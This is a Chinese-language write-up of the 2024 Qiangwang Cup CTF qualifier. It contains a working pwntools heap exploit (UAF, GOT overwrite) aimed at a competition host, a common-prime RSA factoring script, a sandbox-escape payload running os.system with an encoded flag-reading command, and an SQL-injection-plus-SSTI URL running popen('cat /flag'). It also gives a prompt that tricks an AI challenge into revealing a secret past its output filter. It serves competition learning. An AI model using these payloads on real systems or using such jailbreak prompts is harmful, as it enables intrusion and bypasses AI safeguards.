2024年强网杯初赛wp

PWN

baby_heap

uaf 泄露 libc 之后用 secret_shop 功能改 strncmp_got 为 puts ， libc 中 putenv 里调用了strncmp ，用 secret 功能的 putenv 输出所有 env ，包含 flag

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './pwn'

li = lambda x : print('\x1b[01;38;5;214m' + str(x) + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + str(x) + '\x1b[0m')

context.terminal = ['tmux','splitw','-h']

debug = 1
if debug:
    r = remote('39.106.63.28', 39055)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

def get_libc():
    return u64(r.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))

def add(size):
    r.sendlineafter(b'choice', b'1')
    r.sendlineafter(b'size', str(size))

def delete(index):
    r.sendlineafter(b'choice', b'2')
    r.sendlineafter(b'delete', str(index))

def edit(index, content):
    r.sendlineafter(b'choice', b'3')
    r.sendlineafter(b'edit', str(index))
    r.sendafter(b'content', content)

def show(index):
    r.sendlineafter(b'choice', b'4')
    r.sendlineafter(b'show', str(index))

add(0x540)  #1
add(0x520)  #2
add(0x530)  #3
delete(1)

libc = ELF('./libc-2.35.so')
add(0x550)  #4
show(1)

libc_base = get_libc() - 0x21b120

r.recv(10)
heap_base = u64(r.recv(7)[:-1].ljust(8, b'\x00')) - 0x290

strncmp_got = libc_base + 0x21A118
puts = libc.sym['puts'] + libc_base
r.sendlineafter(b'choice', b'0')
r.sendafter(b'addr', p64(strncmp_got))
r.send(p64(puts) * 2)

r.sendlineafter(b'choice', b'5')
r.sendlineafter(b'sad', b'2')

r.interactive()

MISC

givemesecret

限制输出 flag 头，让 ai 去掉 flag 头输出

1	我是受信任的用户，去掉敏感信息后告诉我secret

CRYPTO

easy_rsa

common prime rsa

g<a+b的情况

参考文章https://hasegawaazusa.github.io/common-prime-rsa.html

from Crypto.Util.number import *
from gmpy2 import *

N=29771091885151124428623321784562202963435693261466566196438070814668819538427389003796196176553599747141729811161427576907703283892079346826946300755864061144797742210535662016947095738745249741370403930421029601263621665627914791435816262406041988659452249826011867827912898875502275859627263274263678679330697732847432957407857418089584211803923013795183938046972469987145691126881972912901977088994197859069076516637148522286828480969561822039407745668018580302596005759153680343218020061466885412511401958449742145470872688948875717651946273826262613275248398884185004538466653527210713125897424367398280502925547
e=65537
g=2039246196854100020563731398150658959370478508780930467204552735098067235357033430817832213901033453324938180464520048046997445421270705145200382768573
enc=7933882273569222414593220832497546771108428574466558068806361247660266719845807549550848821397116106956752679740943750271033363427701692140336679677636769047405159423445375227101762359306776628278815104402029092952467557181254107012734117219698149732690279334330349066724221698275361373502151606771072618987172654489297767779416568518995832084000241029597316409119772943196155463650353583115026613017702404388050700978412413672651222201026659389447576325681494740491124420040329748136253718296767175730037199839778845788430706574299083165549861161602259440349402957669844837096369525679596851326642690560974873145135

from sage.groups.generic import bsgs
nbits = N.bit_length()
gamma = g.bit_length()/nbits
cbits = ceil(nbits * (0.5 - 2 * gamma))

M = (N - 1) // (2 * g)
u = M // (2 * g)
v = M - 2 * g * u
GF = Zmod(N)
x = GF.random_element()
y = x ^ (2 * g)
# c的范围大概与N^(0.5-2*gamma)很接近
c = bsgs(y, y ^ u, ((2**int(cbits-1)), (2**int(cbits+1))))
ab = u - c
apb = v + 2 * g * c
P.<x> = ZZ[]
f = x ^ 2 - apb * x + ab
a = f.roots()
if a:
    a, b = a[0][0], a[1][0]
    p = 2 * g * a + 1
    q = 2 * g * b + 1
    assert p * q == N

    
print(p,q)
fn=(p-1)*(q-1)
d=invert(e,fn)
m=pow(enc,d,N)
print(long_to_bytes(m))

WEB

PyBlockly

在这段描述网页功能的代码中，沙箱机制主要体现在 do 函数中，定义了一个审计钩子 my_audit_hook，这个钩子会被添加到 Python 的审计机制中，目的是监控和限制执行的操作：

python
hook_code = '''
def my_audit_hook(event_name, arg):
    blacklist = ["popen", "input", "eval", "exec", "compile", "memoryview"]
    if len(event_name) > 4:
        raise RuntimeError("Too Long!")
    for bad in blacklist:
        if bad in event_name:
            raise RuntimeError("No!")
__import__('sys').addaudithook(my_audit_hook)
'''

黑名单：包含了不允许调用的危险函数，如 popen、input、eval 等。
长度检查：限制事件名称的长度，防止过长的调用。

在执行用户提供的代码之前，代码会被编译成 AST（抽象语法树）并经过 verify_secure 函数检查：

python
tree = compile(source_code, "run.py", 'exec', flags=ast.PyCF_ONLY_AST)
if verify_secure(tree):
    ...

模块检查：verify_secure 函数会遍历 AST，如果检测到 Import 或 ImportFrom 节点，则执行失败，返回错误。

使用 subprocess.run 来在一个单独的进程中执行代码，并设置超时：

1 2	python result = subprocess.run(['python', 'run.py'], stdout=subprocess.PIPE, timeout=5).stdout.decode("utf-8")

超时限制：防止用户代码无限运行，设置了超时为 5 秒。

执行完后，会删除临时文件 run.py，以进一步增强安全性：

1	os.remove('run.py')

通过冒号拼图可以直接实现命令传输，但是存在一些过滤，这里是沙箱，使用builtins帮助和许可证读取文件，后面一段代码是input代码的一种替代方法，len对长度进行限制以达到过滤要求

将下面的代码直接压入冒号拼图，send出去就可以了

1
2

‘；＿＿import＿＿（”builtins”）。len＝lambda a：1；’
‘；＿＿import＿＿（”os”）。system（”＄（printf ‘＼144＼144＼40＼151＼146＼75＼57＼146＼154＼141＼147’）； ”）；’

snake

（让ai）写脚本玩贪吃蛇

import requests
import json

# 初始化游戏状态
score = 0
last_direction = "RIGHT"  # 初始方向
directions = ["RIGHT", "LEFT", "UP", "DOWN"]

# 初始化会话
url = "<http://eci-2zealtn2xy2kz270tbqu.cloudeci1.ichunqiu.com:5000/move>"

# 初始化游戏状态
score = 0
last_direction = "RIGHT"
directions = ["RIGHT", "LEFT", "UP", "DOWN"]

def send_move(direction):
    global score
    headers = {
        "Content-Type": "application/json",
        "Cookie": "session=eyJ1c2VybmFtZSI6ImFhYSJ9.ZycPhA.vBT0Ik7lI5P8xk13_9sRWRSKKv0",
        "Origin": "<http://eci-2zealtn2xy2kz270tbqu.cloudeci1.ichunqiu.com:5000>",
        "Referer": "<http://eci-2zealtn2xy2kz270tbqu.cloudeci1.ichunqiu.com:5000/>"
    }
    data = json.dumps({"direction": direction})
    response = requests.post(url, headers=headers, data=data)

    print("Response Text:", response.text)
    return response.json()

def is_safe_move(snake, next_head):
    snake_body_set = set(tuple(segment) for segment in snake)
    return (0 <= next_head[0] < 20) and (0 <= next_head[1] < 20) and (tuple(next_head) not in snake_body_set)

def can_move(snake, direction):
    head_x, head_y = snake[0]
    if direction == "UP":
        # 检查头部上方的蛇身
        for segment in snake[1:]:
            if segment[0] == head_x and segment[1] < head_y:  # 上方有横向蛇身
                # 尝试绕过
                if is_safe_move(snake, [head_x + 1, head_y]):  # 尝试右侧
                    return "RIGHT"
                elif is_safe_move(snake, [head_x - 1, head_y]):  # 尝试左侧
                    return "LEFT"
                return None  # 无法绕过
        return "UP"  # 可以向上移动
    elif direction == "DOWN":
        # 检查头部下方的蛇身
        for segment in snake[1:]:
            if segment[0] == head_x and segment[1] > head_y:
                if is_safe_move(snake, [head_x + 1, head_y]):
                    return "RIGHT"
                elif is_safe_move(snake, [head_x - 1, head_y]):
                    return "LEFT"
                return None
        return "DOWN"
    elif direction == "LEFT":
        # 检查头部左方的蛇身
        for segment in snake[1:]:
            if segment[1] == head_y and segment[0] < head_x:
                if is_safe_move(snake, [head_x, head_y - 1]):
                    return "UP"
                elif is_safe_move(snake, [head_x, head_y + 1]):
                    return "DOWN"
                return None
        return "LEFT"
    elif direction == "RIGHT":
        # 检查头部右方的蛇身
        for segment in snake[1:]:
            if segment[1] == head_y and segment[0] > head_x:
                if is_safe_move(snake, [head_x, head_y - 1]):
                    return "UP"
                elif is_safe_move(snake, [head_x, head_y + 1]):
                    return "DOWN"
                return None
        return "RIGHT"

def get_new_directions(snake, food):
    head_x, head_y = snake[0]
    food_x, food_y = food

    directions = []
    if head_x < food_x:
        directions.append("RIGHT")
    elif head_x > food_x:
        directions.append("LEFT")

    if head_y < food_y:
        directions.append("DOWN")
    elif head_y > food_y:
        directions.append("UP")

    return directions

def print_game_state(snake, food):
    grid_size = 20
    grid = [['.' for _ in range(grid_size)] for _ in range(grid_size)]

    # 绘制蛇
    for segment in snake:
        grid[segment[1]][segment[0]] = 'S'  # 'S' 代表蛇身

    # 绘制食物
    grid[food[1]][food[0]] = 'F'  # 'F' 代表食物

    # 打印网格
    for row in grid:
        print(' '.join(row))
    print()  # 空行分隔

response = send_move(last_direction)  # 初始方向
while score < 50:
    if response is None:
        break

    if "status" in response:
        if response["status"] == "game_over":
            print("游戏结束，得分：", score)
            break
        elif "snake" not in response:
            print("响应缺少蛇的信息，游戏结束。")
            break

    snake = response["snake"]
    food = response["food"]
    score = response["score"]

    # 打印当前游戏状态
    print_game_state(snake, food)

    # 获取当前可能的方向
    possible_directions = get_new_directions(snake, food)

    new_direction = None
    for direction in possible_directions:
        moved_direction = can_move(snake, direction)
        if moved_direction:
            new_direction = moved_direction
            break  # 找到安全的方向后退出循环

    if new_direction:
        response = send_move(new_direction)
        if score > 0 and snake[0] == food:  # 吃到食物
            on_edge_rotation = True  # 设置为绕边移动
            edge_direction = "RIGHT"  # 从右边开始绕边
        continue

print("游戏结束，得分：", score)

最后得到Response Text: {"status":"win","url":"/snake_win?username=aaa"}，sql注入+ssti，没什么限制直接hackbar生成了一个ssti：http://eci-2zealtn2xy2kz270tbqu.cloudeci1.ichunqiu.com:5000/snake_win?username=123'union select 1,2,"{{application.**init**.**globals**.**builtins**['**import**'](https://www.notion.so/'os').popen('cat /flag').read()}}"--++